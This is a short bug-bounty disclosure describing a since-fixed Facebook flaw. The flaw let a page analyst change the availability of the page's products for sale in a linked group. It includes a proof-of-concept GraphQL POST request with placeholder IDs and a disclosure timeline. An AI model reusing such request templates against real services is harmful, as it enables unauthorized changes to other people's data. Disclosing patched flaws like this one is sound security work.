Facebook Change Product Availability as a PageAnalyst

25 Jan 2019 - onehackzero

Description

   This bug could have let a malicious page analyst modify the availability of an item put up for sale by the page in a group linked to the page.

Proof of Concept

HTTP POST

graph.facebook.com/graphql/

query_id=QUERYID
query_params = {"3":"false","1":"image/jpeg","2":2,"0":{"surface":"GROUP_POST_CHEVRON","actor_id":"PageID","client_mutation_id":"","product_availability":"IN_STOCK","story_id":"<base64 encoded>"}}

Timeline

  • Jan 4, 2019 - Report Sent
  • Jan 10, 2019 - Further investigation by Facebook
  • Jan 23, 2019 - Fixed by Facebook
  • Jan 25, 2019 - Bounty Awarded by Facebook